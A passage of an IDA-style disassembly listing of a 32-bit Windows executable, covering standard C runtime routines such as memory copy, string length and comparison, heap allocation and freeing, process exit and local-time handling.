; sub_401000+37�p ...
jmp dword_40A18C
sub_40341C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403422 proc near ; CODE XREF: sub_401000+22�p
jmp dword_40A1AC
sub_403422 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403428 proc near ; CODE XREF: sub_401063+A5�p
; sub_401118+7F�p
jmp dword_40A188
sub_403428 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40342E proc near ; CODE XREF: sub_401063+29�p
; sub_401118+20�p ...
jmp dword_40A184
sub_40342E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403434 proc near ; CODE XREF: sub_401118+62�p
jmp dword_40A180
sub_403434 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40343A proc near ; CODE XREF: sub_4011A5+35�p
jmp dword_40A17C
sub_40343A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403440 proc near ; CODE XREF: sub_401210+D0�p
jmp dword_40A178
sub_403440 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403446 proc near ; CODE XREF: sub_4013B6+1F�p
jmp dword_40A174
sub_403446 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40344C proc near ; CODE XREF: sub_40140A+17�p
; sub_401554+15�p
jmp dword_40A170
sub_40344C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403452 proc near ; CODE XREF: sub_4014FC+2C�p
jmp dword_40A16C
sub_403452 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403458 proc near ; CODE XREF: sub_4018FD+40�p
jmp dword_40A1A8
sub_403458 endp
; =============== S U B R O U T I N E =======================================
sub_40345E proc near ; CODE XREF: sub_401210+29�p
; sub_401318+21�p ...
arg_0 = dword ptr 4
push dword_40E46C
push [esp+4+arg_0]
call sub_403470
pop ecx
pop ecx
retn
sub_40345E endp
; =============== S U B R O U T I N E =======================================
sub_403470 proc near ; CODE XREF: sub_40345E+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_403499
loc_403477: ; CODE XREF: sub_403470+27�j
push [esp+arg_0]
call sub_40349C
test eax, eax
pop ecx
jnz short locret_40349B
cmp [esp+arg_4], eax
jz short locret_40349B
push [esp+arg_0]
call sub_40433F
test eax, eax
pop ecx
jnz short loc_403477
loc_403499: ; CODE XREF: sub_403470+5�j
xor eax, eax
locret_40349B: ; CODE XREF: sub_403470+13�j
; sub_403470+19�j
retn
sub_403470 endp
; =============== S U B R O U T I N E =======================================
sub_40349C proc near ; CODE XREF: sub_403470+B�p
arg_0 = dword ptr 4
mov eax, dword_410644
push esi
mov esi, [esp+4+arg_0]
cmp eax, 3
jnz short loc_4034C0
cmp esi, dword_41063C
ja short loc_4034F2
push esi
call sub_4048C8
test eax, eax
pop ecx
jz short loc_4034F2
pop esi
retn
; ---------------------------------------------------------------------------
loc_4034C0: ; CODE XREF: sub_40349C+D�j
cmp eax, 2
jnz short loc_4034F2
mov eax, [esp+4+arg_0]
test eax, eax
jz short loc_4034D5
lea esi, [eax+0Fh]
and esi, 0FFFFFFF0h
jmp short loc_4034D8
; ---------------------------------------------------------------------------
loc_4034D5: ; CODE XREF: sub_40349C+2F�j
push 10h
pop esi
loc_4034D8: ; CODE XREF: sub_40349C+37�j
cmp esi, dword_40DA74
ja short loc_4034FF
mov eax, esi
shr eax, 4
push eax
call sub_40536B
test eax, eax
pop ecx
jnz short loc_40350E
jmp short loc_4034FF
; ---------------------------------------------------------------------------
loc_4034F2: ; CODE XREF: sub_40349C+15�j
; sub_40349C+20�j ...
test esi, esi
jnz short loc_4034F9
push 1
pop esi
loc_4034F9: ; CODE XREF: sub_40349C+58�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_4034FF: ; CODE XREF: sub_40349C+42�j
; sub_40349C+54�j
push esi
push 0
push dword_410640
call dword_40A110 ; RtlAllocateHeap
loc_40350E: ; CODE XREF: sub_40349C+52�j
pop esi
retn
sub_40349C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403510 proc near ; CODE XREF: sub_401063+7F�p
; sub_4011A5+22�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_403530
cmp edi, eax
jb loc_4036A8
loc_403530: ; CODE XREF: sub_403510+16�j
test edi, 3
jnz short loc_40354C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40356C
rep movsd
jmp off_403658[edx*4]
; ---------------------------------------------------------------------------
loc_40354C: ; CODE XREF: sub_403510+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_403564
and eax, 3
add ecx, eax
jmp dword ptr loc_40356C+4[eax*4]
; ---------------------------------------------------------------------------
loc_403564: ; CODE XREF: sub_403510+46�j
jmp dword ptr loc_403668[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40356C: ; CODE XREF: sub_403510+31�j
; sub_403510+8E�j ...
jmp off_4035EC[ecx*4]
; ---------------------------------------------------------------------------
align 4
xor byte ptr ds:35AC0040h, 40h
add al, dl
xor eax, 0D1230040h
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_40356C
rep movsd
jmp off_403658[edx*4]
; ---------------------------------------------------------------------------
align 4
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_40356C
rep movsd
jmp off_403658[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_40356C
rep movsd
jmp off_403658[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4035EC dd offset loc_40364F ; DATA XREF: sub_403510:loc_40356C�r
dd offset loc_40363C
dd offset loc_403634
dd offset loc_40362C
dd offset loc_403624
dd offset loc_40361C
dd offset loc_403614
dd offset loc_40360C
; ---------------------------------------------------------------------------
loc_40360C: ; CODE XREF: sub_403510:loc_40356C�j
; DATA XREF: sub_403510+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_403614: ; CODE XREF: sub_403510:loc_40356C�j
; DATA XREF: sub_403510+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40361C: ; CODE XREF: sub_403510:loc_40356C�j
; DATA XREF: sub_403510+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_403624: ; CODE XREF: sub_403510:loc_40356C�j
; DATA XREF: sub_403510+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_40362C: ; CODE XREF: sub_403510:loc_40356C�j
; DATA XREF: sub_403510+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_403634: ; CODE XREF: sub_403510:loc_40356C�j
; DATA XREF: sub_403510+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_40363C: ; CODE XREF: sub_403510:loc_40356C�j
; DATA XREF: sub_403510+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_40364F: ; CODE XREF: sub_403510:loc_40356C�j
; DATA XREF: sub_403510:off_4035EC�o
jmp off_403658[edx*4]
; ---------------------------------------------------------------------------
align 4
off_403658 dd offset loc_403668 ; DATA XREF: sub_403510+35�r
; sub_403510+92�r ...
dd offset loc_403670
dd offset loc_40367C
dd offset loc_403690
; ---------------------------------------------------------------------------
loc_403668: ; CODE XREF: sub_403510+35�j
; sub_403510+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_403670: ; CODE XREF: sub_403510+35�j
; sub_403510+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40367C: ; CODE XREF: sub_403510+35�j
; sub_403510+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_403690: ; CODE XREF: sub_403510+35�j
; sub_403510+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4036A8: ; CODE XREF: sub_403510+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_4036DC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4036D0
std
rep movsd
cld
jmp off_4037F0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4036D0: ; CODE XREF: sub_403510+1B1�j
; sub_403510+208�j ...
neg ecx
jmp off_4037A0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4036DC: ; CODE XREF: sub_403510+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_4036F4
and eax, 3
sub ecx, eax
jmp dword ptr loc_4036F4+4[eax*4]
; ---------------------------------------------------------------------------
loc_4036F4: ; CODE XREF: sub_403510+1D6�j
; DATA XREF: sub_403510+1DD�r
jmp off_4037F0[ecx*4]
; ---------------------------------------------------------------------------
align 4
or [edi], dh
inc eax
add [eax], ch
aaa
inc eax
add [eax+37h], dl
inc eax
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_4036D0
std
rep movsd
cld
jmp off_4037F0[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_4036D0
std
rep movsd
cld
jmp off_4037F0[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_4036D0
std
rep movsd
cld
jmp off_4037F0[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4037A4
dd offset loc_4037AC
dd offset loc_4037B4
dd offset loc_4037BC
dd offset loc_4037C4
dd offset loc_4037CC
dd offset loc_4037D4
off_4037A0 dd offset loc_4037E7 ; DATA XREF: sub_403510+1C2�r
; ---------------------------------------------------------------------------
loc_4037A4: ; DATA XREF: sub_403510+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_4037AC: ; DATA XREF: sub_403510+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_4037B4: ; DATA XREF: sub_403510+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_4037BC: ; DATA XREF: sub_403510+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_4037C4: ; DATA XREF: sub_403510+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_4037CC: ; DATA XREF: sub_403510+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_4037D4: ; DATA XREF: sub_403510+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4037E7: ; CODE XREF: sub_403510+1C2�j
; DATA XREF: sub_403510:off_4037A0�o
jmp off_4037F0[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_4037F0 dd offset loc_403800 ; DATA XREF: sub_403510+1B7�r
; sub_403510:loc_4036F4�r ...
dd offset loc_403808
dd offset loc_403818
dd offset loc_40382C
; ---------------------------------------------------------------------------
loc_403800: ; CODE XREF: sub_403510+1B7�j
; sub_403510:loc_4036F4�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_403808: ; CODE XREF: sub_403510+1B7�j
; sub_403510:loc_4036F4�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_403818: ; CODE XREF: sub_403510+1B7�j
; sub_403510:loc_4036F4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40382C: ; CODE XREF: sub_403510+1B7�j
; sub_403510:loc_4036F4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_403510 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403850 proc near ; CODE XREF: sub_40728A+13D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_40389C
loc_403860: ; CODE XREF: sub_403850+3C�j
; sub_403850+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_403894
or al, al
jz short loc_403890
cmp ah, [ecx+1]
jnz short loc_403894
or ah, ah
jz short loc_403890
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_403894
or al, al
jz short loc_403890
cmp ah, [ecx+3]
jnz short loc_403894
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_403860
mov edi, edi
loc_403890: ; CODE XREF: sub_403850+18�j
; sub_403850+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_403894: ; CODE XREF: sub_403850+14�j
; sub_403850+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_40389C: ; CODE XREF: sub_403850+E�j
test edx, 1
jz short loc_4038B8
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_403894
inc ecx
or al, al
jz short loc_403890
test edx, 2
jz short loc_403860
loc_4038B8: ; CODE XREF: sub_403850+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_403894
or al, al
jz short loc_403890
cmp ah, [ecx+1]
jnz short loc_403894
or ah, ah
jz short loc_403890
add ecx, 2
jmp short loc_403860
sub_403850 endp
; =============== S U B R O U T I N E =======================================
sub_4038D4 proc near ; CODE XREF: sub_404200+93�p
mov eax, dword_41065C
test eax, eax
jz short loc_4038DF
call eax
loc_4038DF: ; CODE XREF: sub_4038D4+7�j
push offset dword_40B014
push offset dword_40B008
call sub_4039BC
push offset dword_40B004
push offset dword_40B000
call sub_4039BC
add esp, 10h
retn
sub_4038D4 endp
; =============== S U B R O U T I N E =======================================
sub_403901 proc near ; CODE XREF: sub_401635+2C3�p
; sub_404200+D2�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_403923
add esp, 0Ch
retn
sub_403901 endp
; =============== S U B R O U T I N E =======================================
sub_403912 proc near ; CODE XREF: seg001:004042F1�p
; sub_4042F6+1C�p
; DATA XREF: ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_403923
add esp, 0Ch
retn
sub_403912 endp
; =============== S U B R O U T I N E =======================================
sub_403923 proc near ; CODE XREF: sub_403901+8�p
; sub_403912+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp dword_40E440, edi
jnz short loc_403940
push [esp+4+arg_0]
call dword_40A114 ; GetCurrentProcess
push eax
call dword_40A0F0 ; TerminateProcess
loc_403940: ; CODE XREF: sub_403923+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_40E43C, edi
mov byte_40E438, bl
jnz short loc_403994
mov eax, dword_410658
test eax, eax
jz short loc_403983
mov ecx, dword_410654
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_403982
loc_40396F: ; CODE XREF: sub_403923+5D�j
mov eax, [esi]
test eax, eax
jz short loc_403977
call eax
loc_403977: ; CODE XREF: sub_403923+50�j
sub esi, 4
cmp esi, dword_410658
jnb short loc_40396F
loc_403982: ; CODE XREF: sub_403923+4A�j
pop esi
loc_403983: ; CODE XREF: sub_403923+3C�j
push offset dword_40B020
push offset dword_40B018
call sub_4039BC
pop ecx
pop ecx
loc_403994: ; CODE XREF: sub_403923+33�j
push offset dword_40B028
push offset dword_40B024
call sub_4039BC
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_4039BA
push [esp+4+arg_0]
mov dword_40E440, edi
call dword_40A0D4 ; ExitProcess
loc_4039BA: ; CODE XREF: sub_403923+85�j
pop edi
retn
sub_403923 endp
; =============== S U B R O U T I N E =======================================
sub_4039BC proc near ; CODE XREF: sub_4038D4+15�p
; sub_4038D4+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_4039C1: ; CODE XREF: sub_4039BC+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_4039D4
mov eax, [esi]
test eax, eax
jz short loc_4039CF
call eax
loc_4039CF: ; CODE XREF: sub_4039BC+F�j
add esi, 4
jmp short loc_4039C1
; ---------------------------------------------------------------------------
loc_4039D4: ; CODE XREF: sub_4039BC+9�j
pop esi
retn
sub_4039BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4039D6 proc near ; CODE XREF: sub_4018FD+46�p
; sub_4018FD+205�p ...
var_CC = byte ptr -0CCh
var_32 = word ptr -32h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
lea eax, [ebp+var_10]
push eax
call dword_40A120 ; GetLocalTime
lea eax, [ebp+var_20]
push eax
call dword_40A11C ; GetSystemTime
mov ax, [ebp+var_16]
cmp ax, word_40E45A
jnz short loc_403A3B
mov ax, [ebp+var_18]
cmp ax, word_40E458
jnz short loc_403A3B
mov ax, [ebp+var_1A]
cmp ax, word_40E456
jnz short loc_403A3B
mov ax, [ebp+var_1E]
cmp ax, word_40E452
jnz short loc_403A3B
mov ax, [ebp+var_20]
cmp ax, word_40E450
jnz short loc_403A3B
mov eax, dword_40E448
jmp short loc_403A80
; ---------------------------------------------------------------------------
loc_403A3B: ; CODE XREF: sub_4039D6+28�j
; sub_4039D6+35�j ...
lea eax, [ebp+var_CC]
push eax
call dword_40A118 ; GetTimeZoneInformation
cmp eax, 0FFFFFFFFh
jz short loc_403A68
cmp eax, 2
jnz short loc_403A64
cmp [ebp+var_32], 0
jz short loc_403A64
cmp [ebp+var_24], 0
jz short loc_403A64
push 1
pop eax
jmp short loc_403A6B
; ---------------------------------------------------------------------------
loc_403A64: ; CODE XREF: sub_4039D6+7A�j
; sub_4039D6+81�j ...
xor eax, eax
jmp short loc_403A6B
; ---------------------------------------------------------------------------
loc_403A68: ; CODE XREF: sub_4039D6+75�j
or eax, 0FFFFFFFFh
loc_403A6B: ; CODE XREF: sub_4039D6+8C�j
; sub_4039D6+90�j
push esi
push edi
lea esi, [ebp+var_20]
mov edi, offset word_40E450
movsd
movsd
movsd
movsd
pop edi
mov dword_40E448, eax
pop esi
loc_403A80: ; CODE XREF: sub_4039D6+63�j
push eax
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_10]
push eax
call sub_405740
mov ecx, [ebp+arg_0]
add esp, 1Ch
test ecx, ecx
jz short locret_403AB0
mov [ecx], eax
locret_403AB0: ; CODE XREF: sub_4039D6+D6�j
leave
retn
sub_4039D6 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403AC0 proc near ; CODE XREF: sub_4011A5+43�p
; sub_401210+96�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_403B13
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_403B07
neg ecx
and ecx, 3
jz short loc_403AE9
sub edx, ecx
loc_403AE3: ; CODE XREF: sub_403AC0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_403AE3
loc_403AE9: ; CODE XREF: sub_403AC0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_403B07
rep stosd
test edx, edx
jz short loc_403B0D
loc_403B07: ; CODE XREF: sub_403AC0+18�j
; sub_403AC0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_403B07
loc_403B0D: ; CODE XREF: sub_403AC0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_403B13: ; CODE XREF: sub_403AC0+A�j
mov eax, [esp+arg_0]
retn
sub_403AC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B18 proc near ; CODE XREF: sub_401210+6A�p
; sub_401210+FB�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_403B7E
mov eax, dword_410644
cmp eax, 3
jnz short loc_403B44
push esi
call sub_404574
pop ecx
test eax, eax
push esi
jz short loc_403B70
push eax
call sub_40459F
pop ecx
pop ecx
jmp short loc_403B7E
; ---------------------------------------------------------------------------
loc_403B44: ; CODE XREF: sub_403B18+14�j
cmp eax, 2
jnz short loc_403B6F
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_4]
push eax
push esi
call sub_4052CF
add esp, 0Ch
test eax, eax
jz short loc_403B6F
push eax
push [ebp+arg_0]
push [ebp+var_4]
call sub_405326
add esp, 0Ch
jmp short loc_403B7E
; ---------------------------------------------------------------------------
loc_403B6F: ; CODE XREF: sub_403B18+2F�j
; sub_403B18+44�j
push esi
loc_403B70: ; CODE XREF: sub_403B18+20�j
push 0
push dword_410640
call dword_40A124 ; RtlFreeHeap
loc_403B7E: ; CODE XREF: sub_403B18+A�j
; sub_403B18+2A�j ...
pop esi
leave
retn
sub_403B18 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403B90 proc near ; CODE XREF: sub_401318+65�p
; sub_401586+46�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_403BB0
loc_403B9C: ; CODE XREF: sub_403B90+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_403BE3
test ecx, 3
jnz short loc_403B9C
add eax, 0
loc_403BB0: ; CODE XREF: sub_403B90+A�j
; sub_403B90+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_403BB0
mov eax, [ecx-4]
test al, al
jz short loc_403C01
test ah, ah
jz short loc_403BF7
test eax, 0FF0000h
jz short loc_403BED
test eax, 0FF000000h
jz short loc_403BE3
jmp short loc_403BB0
; ---------------------------------------------------------------------------
loc_403BE3: ; CODE XREF: sub_403B90+11�j
; sub_403B90+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_403BED: ; CODE XREF: sub_403B90+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_403BF7: ; CODE XREF: sub_403B90+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_403C01: ; CODE XREF: sub_403B90+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_403B90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403C0B proc near ; CODE XREF: sub_401318+4C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push [ebp+arg_C]
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
push [ebp+arg_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
mov [ebp+var_14], 42h
push eax
call sub_405917
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_403C49
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_403C56
; ---------------------------------------------------------------------------
loc_403C49: ; CODE XREF: sub_403C0B+34�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_405802
pop ecx
pop ecx
loc_403C56: ; CODE XREF: sub_403C0B+3C�j
mov eax, esi
pop esi
leave
retn
sub_403C0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403C5B proc near ; CODE XREF: sub_401586+38�p
; sub_401635+14A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
mov [ebp+var_14], 42h
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
mov [ebp+var_1C], 7FFFFFFFh
push eax
call sub_405917
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_403C9B
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_403CA8
; ---------------------------------------------------------------------------
loc_403C9B: ; CODE XREF: sub_403C5B+36�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_405802
pop ecx
pop ecx
loc_403CA8: ; CODE XREF: sub_403C5B+3E�j
mov eax, esi
pop esi
leave
retn
sub_403C5B endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403CB0 proc near ; CODE XREF: sub_401635+255�p
; sub_4065A8+86�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_403D21
sub_403CB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403CC0 proc near ; CODE XREF: sub_4018FD+4AD�p
; sub_406BC4+E6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_403CDC
loc_403CCD: ; CODE XREF: sub_403CC0+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_403D0F
test ecx, 3
jnz short loc_403CCD
loc_403CDC: ; CODE XREF: sub_403CC0+B�j
; sub_403CC0+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_403CDC
mov eax, [ecx-4]
test al, al
jz short loc_403D1E
test ah, ah
jz short loc_403D19
test eax, 0FF0000h
jz short loc_403D14
test eax, 0FF000000h
jz short loc_403D0F
jmp short loc_403CDC
; ---------------------------------------------------------------------------
loc_403D0F: ; CODE XREF: sub_403CC0+12�j
; sub_403CC0+4B�j
lea edi, [ecx-1]
jmp short loc_403D21
; ---------------------------------------------------------------------------
loc_403D14: ; CODE XREF: sub_403CC0+44�j
lea edi, [ecx-2]
jmp short loc_403D21
; ---------------------------------------------------------------------------
loc_403D19: ; CODE XREF: sub_403CC0+3D�j
lea edi, [ecx-3]
jmp short loc_403D21
; ---------------------------------------------------------------------------
loc_403D1E: ; CODE XREF: sub_403CC0+39�j
lea edi, [ecx-4]
loc_403D21: ; CODE XREF: sub_403CB0+5�j
; sub_403CC0+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_403D46
loc_403D2D: ; CODE XREF: sub_403CC0+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_403D98
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_403D2D
jmp short loc_403D46
; ---------------------------------------------------------------------------
loc_403D41: ; CODE XREF: sub_403CC0+9E�j
; sub_403CC0+B8�j
mov [edi], edx
add edi, 4
loc_403D46: ; CODE XREF: sub_403CC0+6B�j
; sub_403CC0+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
